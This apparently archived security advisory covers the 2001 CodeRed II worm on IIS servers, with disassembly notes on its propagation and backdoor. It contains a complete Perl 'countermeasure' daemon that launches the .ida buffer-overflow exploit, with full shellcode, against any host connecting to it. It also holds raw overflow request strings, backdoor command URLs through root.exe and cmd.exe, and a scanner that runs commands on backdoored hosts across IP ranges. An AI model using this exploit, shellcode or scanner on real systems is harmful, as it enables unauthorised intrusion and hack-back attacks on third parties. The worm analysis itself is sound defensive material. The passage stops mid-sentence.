COMMAND
CodeRed II
SYSTEMS AFFECTED
many systems
PROBLEM
There is a new version of Code Red which appears to be spreading
rather rapidly.
- Appears to be a new re-write.
- Drops some sort of remote access trojan.
- Turns off System File Checker (Windows File Protection.)
- Moves CMD.EXE to the scripts directory in IIS (\inetpub\scripts
and \program files\common files\system\msadc)
- Looks like the way they make the entry into code very
differently than before.
- If your IDS is looking for "NNNN", forget it (but then you
should have been shot if you used this string anyway)
Trojan's actions, modifying registry entries, will only work when
their explorer.exe is invoked by a member of the Administrators
group or SYSTEM. This does not appear to be done by the worm
itself (which is running in SYSTEM context), but relies upon an
interactive logon by a member of the Administrators group. With
the worm making copies of CMD.EXE into web accessible and
executable directories, it would be possible to invoke the Trojan
explorer.exe but that would happen in the context of IUSR, which
has insufficient permissions to make the registry changes.
Further, if we assume the Trojan's intended infection vector was a
logon by an Administrator, only Windows 2000 machines which have
not applied SP2 or MS00-052 will run the Trojan program.
It would seem that there is a possible problem with the Code Red
virus affecting IIS server and MS Proxy, even if you have applied
the buffer-overflow patch. People have experienced problems with
Proxy server stopping.
Some code for begining:
#!/usr/bin/perl -w
#Code Red Counter Measures v1.0 by Digital Ebola <digi@legions.org>
#Exploit ripped from rafa@box.sk
#Breakdown: Basically this thing is going to sit on a port (80) and watch for incoming
#webrequests. When it receives one, it will attempt to contact that machine, and overflow
#via idq. This code is quite unfinished, and unrefined. I would like to add expect to it
#and have it create a c:\notworm file on the attacking host. These are features to come.
#The posted exploit by rafa@box.sk is untested by me, but I have tested this daemon, and
#it does make get .ida requests.
#TODO: 1. attack codered infections specifically
# 2. add expect module, and logic needed to automatically copy con the c:\notworm file.
# 3. test the damn thing.
#Yes, I do know this kind of setup can be used for evil. That was my first intention, as old
#habits die hard. Hopefully, this will stop alot of reoccuring infections, and I hope this
#shows the goodness of my beliefs in good countermeasures. Hacker A releases evil code, Hacker
#B releases good code to kill Hacker A's code.
use POSIX;
use IO::Socket;
use Socket;
#Shellcode ripped from rafa@box.sk
@shellcode = ("\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c\x90\x90\x90",
"\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71",
"\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14\x24\x63\xbd",
"\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14",
"\x24\xaa\xbc\xd9\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3\x99\x14\x2c",
"\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c",
"\xaa\xbc\xd9\x99\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9\x99\xcf\x14",
"\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99",
"\x99\x14\x2c\x6c\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf\xd9\x99\x34",
"\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99",
"\x14\x2c\x68\xbc\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9\x99\x34\x14",
"\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99",
"\x99\x99\x5e\x1c\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99\xcf\x14\x2c",
"\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf",
"\xd9\x99\xcf\xf3\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1\x99\x9b\x99",
"\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66",
"\x0c\x63\xbd\xd9\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66\x0c\x67\xbd",
"\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50",
"\xbc\xd9\x99\xcf\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32\xaa\x59\xc9",
"\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6",
"\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59\xc9\x14\x24",
"\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9",
"\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b\x8e\x98\x99",
"\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf",
"\xd9\x99\x99\xb9\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce",
"\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9",
"\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9\x14\x2c\xc8",
"\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99",
"\x14\x24\xfc\xbf\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9\x99\x34\xc9",
"\x66\x0c\xa6\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9",
"\x99\x96\x1e\xfe\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8\xbf\xd9\x99",
"\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9",
"\x99\xf3\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c",
"\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\xf3",
"\x99\x12\x1c\xf8\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99",
"\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc",
"\xd9\x99\x70\x20\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b\xbc\xd9\x99",
"\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9",
"\x99\xc8\xcf\xf1\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8\xcf\xca\xf1",
"\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce",
"\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0",
"\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef",
"\x99\xfa\xf5\xf6\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab",
"\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec",
"\xe9\xd0\xf7\xff\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8",
"\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5",
"\xd8\xf5\xf5\xf6\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0\xed\xfc\xdf",
"\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc",
"\x99\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd\xb9\xfb\xe0",
"\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7",
"\xf6\xeb\xfe\xa7\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x95",
"\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",
"\x99\x99\x99\x99\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99\x89\x99\x99",
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90",
"\x90\x90\x90\x90");
$send="";
@offset=("%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a",
"%u08eb%u16de%u77e5%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=a",
"%u0101%u00b5%u0101%u00b5%u0101%u00b5%u0101%u00b5=x",
"%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6=x");
$port = "80";
$offst = "0";
$max_connections = "100";
$server = IO::Socket::INET->new(LocalPort => $port,
Listen => $max_connections )
or die "Couldn't start server on $port : $@\n";
sub REAPER {
1 until (-1 == waitpid(-1, WNOHANG));
$SIG{CHLD} = \&REAPER;
}
$SIG{CHLD} = \&REAPER;
#while ($hisaddr = accept($client, $server)) {
while ($client = $server->accept()) {
$client->autoflush(1);
next if $pid = fork;
die "fork $!" unless defined $pid;
#otherwise child
close ($server);
$hisip = getpeername($client)
or die "Couldn't identify other end: $!\n";
($hisport, $hisiaddr) = unpack_sockaddr_in($hisip);
$hisip = inet_ntoa($hisiaddr);
print $client "Your 0wned.";
print $client "\n\n";
#rafa's code here too...
foreach $bufer(@shellcode) {
$send="$send$bufer"; }
$shit = "N"x230;
$othershit = "\x90"x11800;
$connect = IO::Socket::INET ->new (Proto=>"tcp", PeerAddr=> "$hisip", PeerPort=>"80"); unless ($connect) { die "cant connect $hisip" }
print $connect "GET /test.ida?$shit$offset[$offst] HTTP/1.0\nyahoo: $othershit$send";
exit;
} continue {
close($client);
}
IBM ethernet switch 8275 model 416 reboots when scanned by Code
Red infected machines.
Following is a text version of one of our Incident Analysis
Reports from the ARIS project. Probably of most interest to this
mailing list is the section down a ways called "technical
Details". Hope you find it useful.
This worm takes advantage of the same vulnerability as the widely
publicized Code Red worm. This worm is not a variant of Code
Red, however, the author has embedded the string "CodeRedII"
inside the code. This would seem to indicate that this worm is
in response to, or inspired by, the original Code Red worm.
This worm has a more malicious payload, a backdoor access method.
It leaves a copy of cmd.exe, named root.exe, in a location
accessible to the web server. If successful, this will allow any
attacker (not just the worm author) access to the victim web
server at a later date.
This worm has been spreading extremely quickly. It takes
advantage of the same ISAPI Indexing Service buffer overflow as
Code Red. However, this worm is a bit more damaging, as it
leaves a backdoor on the victim web server. Once it has infected
a new victim, it spreads out from there, but it favors the same
address space as the current victim. This turns out to be a very
effective spreading mechanism, and many hosts have been
compromised in a very short period of time.
The original Code Red worm sends the following request during the
attack:
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
The new worm sends a very similar header:
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
The difference is that it uses X instead of N as its filler
character. The machine code that follows is different between
the two.
By now, all the major IDS vendors have rules to catch the overflow
attempts. In addition, some of the IDS' are spotting the string
"cmd.exe" in the exploit code, and alarming on that.
SecurityFocus recommends that you update to the latest ruleset
available for your IDS as soon as possible. Even if you are not
affected by the attempts, there are efforts underway to notify
other Internet users that appear to be infected.
Note that the cmd.exe attacks have a very sharp growth rate,
while the actual overflow attacks remain relatively flat. The
cmd.exe attacks are new with this worm (they didn't appear with
Code Red), while Code Red tends to mask the activity of the new
worm at present.
The new worm doesn't favor a particular language version of
Windows 2000 for attack. In fact, it attacks all language
versions, and if it finds it is running on a Chinese version of
Windows, it spawns twice as many threads.
Following technical description is based on an analysis and
disassembly performed by Marc Maiffret and Ryan Permeh of eEye
Digital Security. Their full analysis and disassembly can be
found at the following location:
http://www.eeye.com/html/advisories/coderedII.zip
The worm has three sections: The infection mechanism, the
propagation mechanism, and trojan component.
When the worm successfully installs itself on a new victim, it
goes through a number of initialization steps:
* Obtains the current victim's IP address (used in propagation
step, see below)
* Checks to see if the system language is Chinese (Taiwanese or
PRC)
* Checks for previous execution, if so then it jumps to propagation
* Checks to see if the "CodeRedII" atom has been set, if so then
sleep forever (kills new arrivals of same worm)
* Adds the "CodeRedII" atom (if previous check failed)
* Sets the number of worker threads to 300, or if it is a Chinese
system, 600.
* Spawns a thread back at the first step, which will then jump to
propagation, since that will no longer be the first execution
* Calls the trojan functions
* Sleeps for 1 day on non-Chinese system, 2 on Chinese
* Reboots the system (which will remove any memory resident worms,
leaving only the backdoors and explorer.exe trojan)
The propagation mechanism is the most novel aspect of this
particular worm. Here are the steps performed:
* Check local time. If it is less than the year 2002 and is also
less than the 10th month, then continue. Otherwise, reboot.
This should limit the worm to the end of September, 2001 if it
lives that long.
* Sets up the sockets needed to connect to other potential
victims. Uses non-blocking sockets, which gives a performance
advantage.
* If it gets a connect, it sends a copy of itself (so far, all
copies are identical, no self-modifying code)
* Repeat
The most interesting piece is how it selects a new victim IP
address to try. The worm generates 4 octets in the range 1
through 254, to avoid IP addresses with a 0 or 255. It takes one
of these bytes, and binary ANDs it with 7, yielding a random
number between 0 and 7. It then consults a table:
dd 0FFFFFFFFh ; 0 - addr masks
dd 0FFFFFF00h ; 1
dd 0FFFFFF00h ; 2
dd 0FFFFFF00h ; 3
dd 0FFFFFF00h ; 4
dd 0FFFF0000h ; 5
dd 0FFFF0000h ; 6
dd 0FFFF0000h ; 7
which determines how much of the randomly generated IP address
will be used versus the original address. For example, if it
generates a 5, then half will be random, and half will be the old
IP address. If the current victim IP address is 192.168.1.1, the
new one to try might be 192.168.45.67 (byte order is reversed in
the machine code.)
This has the result that 3 times out of 8, it stays within the
equivalent of a Class B of the attacker, 4 times out of 8, it
stays within a Class A equivalent, and 1 time out of 8, it goes
after a completely random IP address.
For the most part, the Internet address space is a sparse matrix.
Many of the possible (and assigned) addresses are not reachable
from the Internet. Still others have been delegated to a
particular ISP or geographic region, but are not yet in use by
actual customers. The result is that actual hosts tend to be
bunched together in numerically-related netblocks. The CodeRed II
worm favors nearby IP addresses which tend to have similar host
types (i.e. Windows), so it is exhibiting a much higher rate of
growth than previous worms. This also means that if it finds its
way onto an RFC1918 network, it would likely be much more damaging
to that network than previous worms.
It should also be noted that the worm takes measures to avoid
127.x.x.x and 224.x.x.x. Finally, during the trojan step is when
the backdoors are installed. This portion has the following
steps:
* Gets the system directory (usually c:\winnt\system32)
* Appends cmd.exe to the string
* Copies the resulting string (usually c:\winnt\system32\cmd.exe)
to c:\inetpub\scripts\root.exe and
c:\progra~1\common~1\system\MSADC\root.exe
* Creates c:\explorer.exe
* Goes back and repeats the steps for drive d: instead of c:
The worm itself is memory-resident only. However, it may leave
behind files named root.exe, in the script and msadc directories
under the IIS webroot. These should of course be deleted, as
they are copies of cmd.exe, and will permit remote access to your
web server. In addition, a file named explorer.exe will be
created in the root of c: and d: if it exists. This needs to be
removed, and the host rebooted.
Here is more details about Infection steps performed by worm.
A. The first thing the worm does is setup a jump table so that it
can get to all of its needed functions.
seg000:000001D0
B. The worm then proceedes to get its local IP address. This is
later used to deal with subnet masks (propagation) and to make
sure that the worm does not reinfect the local system.
seg000:000001D5
C. Next, the worm gets the local System Language to see if the
local system is running Chinese (Taiwanese) or Chinese (PRC).
seg000:000001F9
D. At this point the worm checks if we've executed before, and if
so, then the worm will procede to the propagation section.
(propagation section)
seg000:0000021A
E. Next, the worm will check to see if a CodeRedII atom has been
placed (GlobalFindAtomA). This functionality allows the worm
to make sure not to re-infect the local machine. If it sees
that the atom exists then it sleeps forever.
seg000:00000240
F. The worm will add a CodeRedII atom. This is to allow the
worm the functionality to check to see if a system has already
been infected with the worm.
seg000:0000027D
G. The worm now sets its number of threads to 300 for non-Chinese
systems. If the system is Chinese then it sets it to 600.
seg000:00000286
H. At this point the worm spawns a thread starting back at step
A. The worm will spawn threads according to the number set
from G. Each new thread will be a propagation thread.
seg000:000002BA
I. This is where the worm calls the trojan functionality. You can
find an analysis of the trojan mechanism down below in the
Trojan System section.
seg000:000002C4
K. The worm then sleeps for 1 day if the local system is not
Chinese, 2 days if it is.
seg000:000002DA
L. Reboot Windows.
seg000:000002E1
For steps of propagation, this is used to spread the worm further.
seg000:000002EB
A. Setup local IP_STORAGE variable. This is used for worm
propagation functionality and to make sure not to re-infect
the local system.
seg000:000002EB
B. Sleep for 64h miliseconds
seg000:000002F1
C. Get local system time. The worm checks to see if it the year
is less than 2002 or if the month is less than 10. If the date
is beyond either of those, then the worm reboots the local
system. That basically limits the worm to 10/01 for its
spreading (In a perfect world.)
seg000:000002FD
D. Setup SockAddr_in. This will reference the GET_IP section.
seg000:0000031A
E. Setup Socket: This performs a Socket(), stores the handle,
then makes it a non-blocking socket (this is important for
speed dealing with connect() calls)
seg000:00000337
F. Connect to the remote host, if it returns a connect right
away, goto H.
seg000:00000357
The following is how the worm generates the IP address for the
next host to connect to:
GET_IP: ; CODE XREF: sub_1C4+168�p
call GET_OCTET ; load 4th octet (this is in reverse ordwer due to
byte ordering)
mov bh, al
call GET_OCTET ; get 3rd octet
mov bl, al
shl ebx, 10h ; shift bx to the top of ebx
call GET_OCTET ; get 2nd octet
mov bh, al
call GET_OCTET ; 1st
mov bl, al
call GEN_OCTET ; get first octet
and eax, 7 ; and it by 7
call CHECK_ADDR_MASK ; ecx has eip
For each octet, generate a psuedo random byte between 1 and
254, next get a random octet between 1 and 254 and mask it by
7 finally, use this last byte to gen a 1st octet.
Most pertinent bit is CHECK_ADDR_MASK
This specifies the following:
dd 0FFFFFFFFh ; 0 - addr masks
dd 0FFFFFF00h ; 1
dd 0FFFFFF00h ; 2
dd 0FFFFFF00h ; 3
dd 0FFFFFF00h ; 4
dd 0FFFF0000h ; 5
dd 0FFFF0000h ; 6
dd 0FFFF0000h ; 7
This mask is applied to the local systems IP address, and
matched to the generated IP Address. This makes a new ip
with 0,1 or 2 bytes of data with the local ip.
For instace, the worm will 1/8th of the time generate a random
IP not within any ranges of the local IP Address. 1/2th of
the time, it will stay within the same class A range of the
local IP Address 3/8th of the time, it will stay within the
same class B range of the local IP Address
Also note that if the IP the worm generates is 127.x.x.x,
224.x.x.x, or the same as the local systems IP address then the
worm will skip that IP address and generate a new IP address to
try to infect.
The way the worm generates IP addresses allows it to find more
possible IIS web servers quicker then the other CodeRed worms
that have previously been released. This new worm is also
going to cause a lot more data to be zig zaged across networks.
G. Do a select to get the handle. If no handle is returned, then
goto K.
seg000:000003B6
H. Set socket to Blocking. This is so select isn't required after
the connect.
seg000:000003C5
I. Send a copy of the worm.
seg000:000003E4
J. Do a recv. this is not actually used anywhere.
seg000:000003FC
K. Close the socket and loop to A.
This portion of the worm is designed to dump root.exe (root.exe
is cmd.exe) into msadc and scripts, and create a trojan on the
local drive.
seg000:00000804
A. Get System directory, this gets the native system directory
(ie, c:\winnt\system32)
seg000:00000810
B. Append cmd to the system directory string (c:\winnt\system32\cmd.exe)
seg000:00000828
C. Set drive modifier to c:
seg000:0000082D
D. copy cmd.exe to /scripts/root.exe (Actual path: Drivemodifier:\inetpub\scripts\root.exe)
seg000:00000831
E. copy cmd.exe to /msadc/root.exe (Actual Path: DriveModifier:\progra~1\common~1\system\MSADC\root.exe)
seg000:00000863
F. Intitialize area for explorer.exe
seg000:000008A2
G. Create Drive/explorer.exe (drive is c, then d)
seg000:00000E83
H. The worm now writes out explorer.exe. There is an embedded
binary within the worm that will be written out to
explorer.exe. It has the property that if an embedded byte is
0xFC, it geplaced by 20h 0x00 bytes instead of the regularbyte.
For more on what the trojan explorer.exe binary does then goto
the Explorer.exe Trojan section. Also the way NT works is
that when a user logs into the local system it has to load
explorer.exe (desktop, task bar etc...) however NT looks for
explorer.exe first in the main drive path c:\ which means the
trojan explorer.exe is going to be loaded the next time a user
logs in... therefore keeping the system trojaned over and
over and over.
seg000:00000EC8
I. close explorer.exe
seg000:00000ED5
J. Change drive modifier to D, then the worm goes back to the
code in step D. After it is done then it goes back to step k
of the infection process.
seg000:00000EDD
explorer.exe quick overview:
============================
1. Get local systems windows directory.
2. Execute explorer.exe from within the local systems windows
directory.
3. The worm now goes into the following loop:
while(1)
{
set SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable to
0FFFFFF9Dh, which basically disables system file protection.
set SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\Scripts to ,,217
set SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\msadc to ,,217
Set SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\c to c:\,,217
Set SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\d to d:\,,217
sleep for 10 minutes
}
Basically the above code creates a virtual web path (/c and /d)
which maps /c to c:\ and /d to d:\. The writer of this worm has
put in this functionality to allow for a backdoor to be placed on
the system so even if you remove the root.exe (cmd.exe prompt)
from your /scripts folder an attacker can still use the /c and /d
virtual roots to compromise your system. The attacks would
basically look like:
http://IpAddress/c/inetpub/scripts/root.exe?/c+dir
(if root.exe was still there) or:
http://IpAddress/c/winnt/system32/cmd.exe?/c+dir
Where dir could be any command an attacker would want to execute.
As long as the trojan explorer.exe is running then an attacker
will be able to remotely access your server.
It appears that most of the CRII and III traffic is coming from
W2K servers from home user machines.
Here is the scanner for root.exe:
#!/usr/bin/perl
#################################################################
# domscan heavily modified to find root.exe on any number #
# of hosts. Although not the quickest scanner it's better #
# than searching by hand, no? #
# Also you can play with the timeout to your likeings. I just #
# chose 2 because of slow webservers. Feel free to try 1. #
# if you modify this please put my email on it, and send me #
# the revised code. #
# written by: idawson@athenasecurity.com. #
# (domscan written by Pavel Aubuchon-Mendoza, 1998 #
# root@deviance.org, http://www.deviance.org/ #
# give props to him because his ip scheme is sweet ;). #
# Usage: ./rootscan 111.111.111.111 222.222.222.222 #
#################################################################
use IO::Socket;
$start = $ARGV[0];
$end = $ARGV[1];
$EOL = "\015\012";
$BLANK = $EOL x 4;
if($start eq "" || $end eq "") { &usage; }
print "Show every connection attempt [y/n]?: ";
chomp($verbose=<STDIN>);
if ($verbose eq "y")
{
$verbose = 1;
} else {
$verbose = 0;
print "\n\nPlease wait for results...\n"
}
@ip1 = split(/\./,$start);
@ip2 = split(/\./,$end);
$numip1 = &countelm(@ip1);
$numip2 = &countelm(@ip2);
if($numip1 ne 4 || $numip2 ne 4) {
print "\nMalformed Ip address!\n";
die "Breaking on bad IP";
}
$ip1 = (($ip1[0]*16777216)+($ip1[1]*65536)+($ip1[2]*256)+$ip1[3]);
$ip2 = (($ip2[0]*16777216)+($ip2[1]*65536)+($ip2[2]*256)+$ip2[3]);
if($ip2 < $ip1) { die "Way to type cap'n..."; }
print "\nroot.exe Scanner Written by: idawson\@athenasecurity.com\n";
print "Scanning from $start to $end\n\n";
$cip = $ip1;
$eip = $ip2+1;
$log = "$start.log";
open(FOUND, ">>$log") || warn "can't log to $log: $!";
@dirs = ("/msadc", "/scripts");
@found = ();
$i = 0;
while($cip ne $eip)
{
@bytes = &getquad($cip);
$target = "$bytes[0]\.$bytes[1]\.$bytes[2]\.$bytes[3]";
foreach $dirs (@dirs)
{
$flag = 0;
@res = ();
$results = ();
if ($verbose == 1) { print "\nTrying $target$dirs/root.exe\t"; }
$host = $target;
$port = 80;
$sock = new IO::Socket::INET(PeerAddr => $host,
PeerPort => $port,
Timeout => 2,
Proto => 'tcp');
if(!$sock) { $flag = 0;
if ($verbose == 1) { print "Can't Connect";}
} else {
$SIG{ALRM} = sub { die "Timed Out"; };
alarm(10);
eval {
$cmd = "GET $dirs/root.exe?/c+dir HTTP/1.0$BLANK";
print $sock "$cmd";
read $sock, $results, 1000;
alarm(0); # cancel pending alarm
};
}
if ($@ =~ /Timed Out/) {
print "Timed out\n";
close($sock);
} else {
@res = split(/\n/, $results);
if ($res[0] =~ /HTTP\/1.1 200/)
{
$found[$i] = ("$target$dirs\n");
$flag = 1;
print FOUND "$found[$i]\n";
if ($flag == 1 && $verbose == 1)
{ print "\tFound\n";
}
}
if ($flag == 0 && $verbose == 1) { print "\tNot Found\n"; }
}
$i++;
}
$cip++;
}
@flog = (
"IP\(s\) with root.exe backdoor:",
"-----------------------------",
);
print join("\n",@flog) . "\n";
print @found;
close(FOUND);
sub getquad {
my($ip) = @_;
$bytes[0] = int $ip/16777216;
$rem = $ip % 16777216;
$bytes[1] = int $rem/65536;
$rem = $rem % 65536;
$bytes[2] = int $rem/256;
$rem = $rem % 256;
$bytes[3] = $rem;
@bytes;
}
sub usage {
print "root.exe scanner for help locating cr2 backdoor.\n\n";
print "coded by:idawson\@athenasecurity.com";
print "\nSyntax:\n\n";
print " $0 [starting IP] [ending IP]\n\n";
print " Ex : $0 1.1.1.1 1.1.2.36\n\n\n";
die "Invalid syntax.\n";
}
sub countelm {
my(@ip) = @_;
$count = 0;
while($ip[$count] ne "") {
$count++;
}
$count;
}
It has been confirmed that despite being patched, some NT4
servers are subject to crashing when processing URLS from Code
Red and its variants. This occurs on patched NT4 servers that
use redirection. W2K is not affected. Those of you using
redirection enabled in the IIS Snap-in should take immediate
action to ensure you are not vulnerable to this problem. This is
not a problem if you use scripting to redirect your site or pages.
For those of you with Xerox N40 printers that have been falling
over on the Code Red worm scan, Xerox has a firmware upgrade.
Call Xerox support at 800-835-6100, push 1, push 1, and ask for
the 1.87-25 version of the firmware.
There's a common misconception floating around that Windows 2000
Professional cannot be participating in the Code Red issue. This
is flat out wrong!
Its believed that PWS (Personal Web Server) on W2K Professional is
somehow *not* IIS 5.0 (Internet Information Services 5.0). This
is flat out wrong!
PWS on W2K **IS** IIS 5.0. The difference between these two
"products" is not in the code that they operate, or the features
they support, its strictly within the Management Interface.
PWM, or Personal Web Manager, is an executable which provides
limited control over the web server. Internet Services Manager
is the full-blown MMC snap-in which provides all control over the
web server.
Either can be used on a W2K Professional Box which has installed
IIS (or PWS). They can be found on such a box in the following
locations:
